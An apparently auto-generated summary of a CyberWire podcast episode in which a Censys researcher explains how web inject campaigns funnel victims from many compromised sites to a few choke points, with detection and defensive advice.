CyberWire Daily: "Caught in the Funnel" [Research Saturday]

Date: January 24, 2026
Host: Dave Bittner
Guest: Andrew Northern, Principal Security Researcher at Censys

Episode Overview

This Research Saturday episode dives deep into the evolving landscape of web-based cyberattacks, focusing on the "funneling" behavior observed in large-scale inject-based campaigns. Dave Bittner interviews Andrew Northern about his research, "From Evasion to Exploiting the Funneling Behavior of Injects," which uncovers how attackers leverage massive numbers of compromised websites to steer victims toward key infrastructure choke points—making attacks both scalable and difficult to block.

Key Discussion Points and Insights

The Shift to Web-Based Delivery

Threat Evolution: Attackers are increasingly using web technologies for delivering both lures and malicious payloads, moving away from static methods like traditional email-based attacks.
- Quote:
  "We're seeing adoption of web technologies as the way that threat actors are choosing to deliver both lures and payloads as opposed to traditional means of perhaps delivering static payloads through traditional avenues such as email."
  — Andrew Northern (02:08)

What Are "Injects"?

Definition: Injects refer to pieces of malicious code inserted into legitimate websites, often without the owner's knowledge.
- Attackers compromise sites (via software vulnerabilities or credential stuffing) and inject code.
- The site appears normal to owners and users until the attack is triggered.
- Quote:
  "So when I'm speaking of injects, I'm speaking of injected malicious code that was not intended to be there by the rightful owner of the website."
  — Andrew Northern (03:11)

Funneling Behavior Explained

Attack Flow: Thousands of compromised sites (the "edge") route victims through intermediate redirectors/loaders, then to a small set of final payload delivery sites (the "choke points").
- This funnel-like structure increases the campaign’s reach while concentrating the actual malicious infrastructure.
- Quote:
  "Large numbers of these compromised or low value sites are wired to steer victims into a much smaller set of shared infrastructure."
  — Andrew Northern (05:00)

Importance of Choke Points

Defensive Focus: With so many compromised sites, tracking each one individually is impractical.
- By identifying the relatively few shared redirect points (choke points), defenders can more effectively leverage their detection and blocking resources.
- Quote:
  "By focusing on these choke points...defenders are better positioned to use their tools to protect themselves, their users and their domains."
  — Andrew Northern (05:59)

Attack Chain Identification Methodology

Andrew Northern’s Five-Step Approach:

Find Seed Patterns: Use anomalies or incident reports to identify initial suspicious activity (e.g., fake CAPTCHA templates, characteristic script names).
Scale Search: Use content matching (exact and fuzzy) against large datasets to identify likely malicious sites.
Graph the Attack Chain: Map out relationships between injected code, the next redirect, and shared resources.
Locate Choke Points: Identify where large numbers of infected sites lead to a small set of key redirectors/loaders.
Manual Validation: Simulate the attack as an end user to confirm chains lead to the intended final payload.
- Quote:
  "I'll go ahead and hunt based upon the choke points...make sure that while I'm walking those chains manually...I am ultimately reaching those payloads."
  — Andrew Northern (09:38)

Patterns and Trends Across Campaigns

Shared Techniques: Even among different actor groups, techniques are copied and in vogue methods propagate rapidly.
Injection Evolution: Attackers have shifted from obvious scripts in main page headers to embedding payloads in auxiliary JavaScript libraries loaded by the page (e.g., for slideshows or forms).
- Quote:
  "Threat actors were very predictably moving to the same JavaScript library over and over again and putting the code in there that will rotate over time."
  — Andrew Northern (11:31)

Monitoring and Defensive Recommendations

Know Your Baseline: Defenders must understand normal behavior on endpoints to detect anomalies.
Windows Policy Example: Associate .js files with a text editor instead of the Windows Script Host to prevent accidental execution by users.
- Quote:
  "Have it associate with something that would make it benign, like a notepad or text editor. So if someone is lured into...downloading a payload...it would not infect the system..."
  — Andrew Northern (14:49)

Trends: Increasing Prevalence and Innovation

Growing Use: Web-based inject attacks are more common than ever, with threat actors shifting from binaries to web-based lures.
Popular Lures:
- Fake CAPTCHA: Users conditioned to solve CAPTCHAs are tricked into actions that execute payloads (paste commands, etc.).
- Fake Updates: Fake browser/software update prompts exploit users’ security training to deliver malware.
- Quotes:
  "The biggest one that I've been seeing over the past year or so is a fake captcha...The threat actors are preying upon our conditioning..."
  — Andrew Northern (16:33)
  
  "Traditionally...a fake update...telling you that a critical piece of software on your computer is out of date."
  — Andrew Northern (17:43)

Where Is the Threat Heading?

Persistence and Sophistication: Attacks are evolving, with techniques like "Ether hiding" incorporating blockchain smart contracts to store payloads/redirects, making takedown nearly impossible.
- Quote:
  "They're now using part of the blockchain as well...that ledger has objects on it called smart contracts...that can be called from the HTML and JavaScript to read the contents...it's really hard to take these types of things down."
  — Andrew Northern (19:13)

Threat Actor Sophistication

Dual Landscape:
- Apex Predators: Highly skilled, rapidly innovating threat actors lead the charge, often motivated by financial gain or selling access.
- Copycats: Widespread availability of AI tools like ChatGPT has lowered the bar, leading to an influx of new, less-skilled actors.
- Impact: The increased volume and similarity in attack methods muddies attribution efforts for researchers.
- Quote:
  "The barrier to entry...has greatly been lowered. So now we're seeing a lot of copycats...it also muddies the water for researchers who are trying to track and do attribution..."
  — Andrew Northern (21:48)

Memorable Quotes and Timestamps

On funneling attacks:
"Those choke points are important because...the number of infected or injected sites...is astronomical. There are at any given time...tens of thousands of these compromised sites." — Andrew Northern (05:59)
On attacker adaptation:
"I've seen threat actor groups that were using traditional means...pivoted to start...using these web based attacks." — Andrew Northern (15:57)
On fake CAPTCHA lures:
"Threat actors are preying upon our conditioning to interact with these captchas...commands right on our clipboard." — Andrew Northern (16:35)
On the future threat:
"I don't think that they're going to be going anywhere. And the difficulty for defenders in tracking and reproducing these steps is becoming more difficult..." — Andrew Northern (20:09)

Important Timestamps

02:08 — Shift towards web-based attacks
03:11 — Definition of injects
05:00 — Explaining funneling and choke points
06:58 — Tracing attack chains (five-step method)
14:22 — Defensive recommendations
15:57 — Prevalence and attacker adaptation
16:33 — Fake CAPTCHA lure technique
19:13 — The "Ether hiding" blockchain-based technique
21:09 — Threat actor sophistication, AI’s role in proliferation

Conclusion

Takeaways:
Web-based inject attacks are growing in prevalence and sophistication, exploiting both technological vulnerabilities and human behavior. Focusing on choke points within the attack funnel can be an effective mitigation strategy. The future points toward more persistent and evasive campaigns, especially as threat actors increasingly leverage innovative technologies like blockchain and AI tools.

Guest: Andrew Northern’s research provides essential insights for defenders, highlighting both technical detection strategies and the importance of understanding user behavior and baseline system operations.

For further detail: See the full research report: From Evasion to Exploiting the Funneling Behavior of Injects by Censys.

CyberWire Daily: "Caught in the Funnel" [Research Saturday]

Date: January 24, 2026
Host: Dave Bittner
Guest: Andrew Northern, Principal Security Researcher at Censys

Episode Overview

Key Discussion Points and Insights

The Shift to Web-Based Delivery

Threat Evolution: Attackers are increasingly using web technologies for delivering both lures and malicious payloads, moving away from static methods like traditional email-based attacks.
- Quote:
  "We're seeing adoption of web technologies as the way that threat actors are choosing to deliver both lures and payloads as opposed to traditional means of perhaps delivering static payloads through traditional avenues such as email."
  — Andrew Northern (02:08)

What Are "Injects"?

Definition: Injects refer to pieces of malicious code inserted into legitimate websites, often without the owner's knowledge.
- Attackers compromise sites (via software vulnerabilities or credential stuffing) and inject code.
- The site appears normal to owners and users until the attack is triggered.
- Quote:
  "So when I'm speaking of injects, I'm speaking of injected malicious code that was not intended to be there by the rightful owner of the website."
  — Andrew Northern (03:11)

Funneling Behavior Explained

Attack Flow: Thousands of compromised sites (the "edge") route victims through intermediate redirectors/loaders, then to a small set of final payload delivery sites (the "choke points").
- This funnel-like structure increases the campaign’s reach while concentrating the actual malicious infrastructure.
- Quote:
  "Large numbers of these compromised or low value sites are wired to steer victims into a much smaller set of shared infrastructure."
  — Andrew Northern (05:00)

Importance of Choke Points

Defensive Focus: With so many compromised sites, tracking each one individually is impractical.
- By identifying the relatively few shared redirect points (choke points), defenders can more effectively leverage their detection and blocking resources.
- Quote:
  "By focusing on these choke points...defenders are better positioned to use their tools to protect themselves, their users and their domains."
  — Andrew Northern (05:59)

Attack Chain Identification Methodology

Andrew Northern’s Five-Step Approach:

Find Seed Patterns: Use anomalies or incident reports to identify initial suspicious activity (e.g., fake CAPTCHA templates, characteristic script names).
Scale Search: Use content matching (exact and fuzzy) against large datasets to identify likely malicious sites.
Graph the Attack Chain: Map out relationships between injected code, the next redirect, and shared resources.
Locate Choke Points: Identify where large numbers of infected sites lead to a small set of key redirectors/loaders.
Manual Validation: Simulate the attack as an end user to confirm chains lead to the intended final payload.
- Quote:
  "I'll go ahead and hunt based upon the choke points...make sure that while I'm walking those chains manually...I am ultimately reaching those payloads."
  — Andrew Northern (09:38)

Patterns and Trends Across Campaigns

Shared Techniques: Even among different actor groups, techniques are copied and in vogue methods propagate rapidly.
Injection Evolution: Attackers have shifted from obvious scripts in main page headers to embedding payloads in auxiliary JavaScript libraries loaded by the page (e.g., for slideshows or forms).
- Quote:
  "Threat actors were very predictably moving to the same JavaScript library over and over again and putting the code in there that will rotate over time."
  — Andrew Northern (11:31)

Monitoring and Defensive Recommendations

Know Your Baseline: Defenders must understand normal behavior on endpoints to detect anomalies.
Windows Policy Example: Associate .js files with a text editor instead of the Windows Script Host to prevent accidental execution by users.
- Quote:
  "Have it associate with something that would make it benign, like a notepad or text editor. So if someone is lured into...downloading a payload...it would not infect the system..."
  — Andrew Northern (14:49)

Trends: Increasing Prevalence and Innovation

Growing Use: Web-based inject attacks are more common than ever, with threat actors shifting from binaries to web-based lures.
Popular Lures:
- Fake CAPTCHA: Users conditioned to solve CAPTCHAs are tricked into actions that execute payloads (paste commands, etc.).
- Fake Updates: Fake browser/software update prompts exploit users’ security training to deliver malware.
- Quotes:
  "The biggest one that I've been seeing over the past year or so is a fake captcha...The threat actors are preying upon our conditioning..."
  — Andrew Northern (16:33)
  
  "Traditionally...a fake update...telling you that a critical piece of software on your computer is out of date."
  — Andrew Northern (17:43)

Where Is the Threat Heading?

Persistence and Sophistication: Attacks are evolving, with techniques like "Ether hiding" incorporating blockchain smart contracts to store payloads/redirects, making takedown nearly impossible.
- Quote:
  "They're now using part of the blockchain as well...that ledger has objects on it called smart contracts...that can be called from the HTML and JavaScript to read the contents...it's really hard to take these types of things down."
  — Andrew Northern (19:13)

Threat Actor Sophistication

Dual Landscape:
- Apex Predators: Highly skilled, rapidly innovating threat actors lead the charge, often motivated by financial gain or selling access.
- Copycats: Widespread availability of AI tools like ChatGPT has lowered the bar, leading to an influx of new, less-skilled actors.
- Impact: The increased volume and similarity in attack methods muddies attribution efforts for researchers.
- Quote:
  "The barrier to entry...has greatly been lowered. So now we're seeing a lot of copycats...it also muddies the water for researchers who are trying to track and do attribution..."
  — Andrew Northern (21:48)

Memorable Quotes and Timestamps

On funneling attacks:
"Those choke points are important because...the number of infected or injected sites...is astronomical. There are at any given time...tens of thousands of these compromised sites." — Andrew Northern (05:59)
On attacker adaptation:
"I've seen threat actor groups that were using traditional means...pivoted to start...using these web based attacks." — Andrew Northern (15:57)
On fake CAPTCHA lures:
"Threat actors are preying upon our conditioning to interact with these captchas...commands right on our clipboard." — Andrew Northern (16:35)
On the future threat:
"I don't think that they're going to be going anywhere. And the difficulty for defenders in tracking and reproducing these steps is becoming more difficult..." — Andrew Northern (20:09)

Important Timestamps

02:08 — Shift towards web-based attacks
03:11 — Definition of injects
05:00 — Explaining funneling and choke points
06:58 — Tracing attack chains (five-step method)
14:22 — Defensive recommendations
15:57 — Prevalence and attacker adaptation
16:33 — Fake CAPTCHA lure technique
19:13 — The "Ether hiding" blockchain-based technique
21:09 — Threat actor sophistication, AI’s role in proliferation

Conclusion

For further detail: See the full research report: From Evasion to Exploiting the Funneling Behavior of Injects by Censys.

wavePod

Caught in the funnel. [Research Saturday]

Powered by Wave AI

Summary

CyberWire Daily: "Caught in the Funnel" [Research Saturday]

Episode Overview

Key Discussion Points and Insights

The Shift to Web-Based Delivery

What Are "Injects"?

Funneling Behavior Explained

Importance of Choke Points

Attack Chain Identification Methodology

Patterns and Trends Across Campaigns

Monitoring and Defensive Recommendations

Trends: Increasing Prevalence and Innovation

Where Is the Threat Heading?

Threat Actor Sophistication

Memorable Quotes and Timestamps

Important Timestamps

Conclusion

Summary

CyberWire Daily: "Caught in the Funnel" [Research Saturday]

Episode Overview

Key Discussion Points and Insights

The Shift to Web-Based Delivery

What Are "Injects"?

Funneling Behavior Explained

Importance of Choke Points

Attack Chain Identification Methodology

Patterns and Trends Across Campaigns

Monitoring and Defensive Recommendations

Trends: Increasing Prevalence and Innovation

Where Is the Threat Heading?

Threat Actor Sophistication

Memorable Quotes and Timestamps

Important Timestamps

Conclusion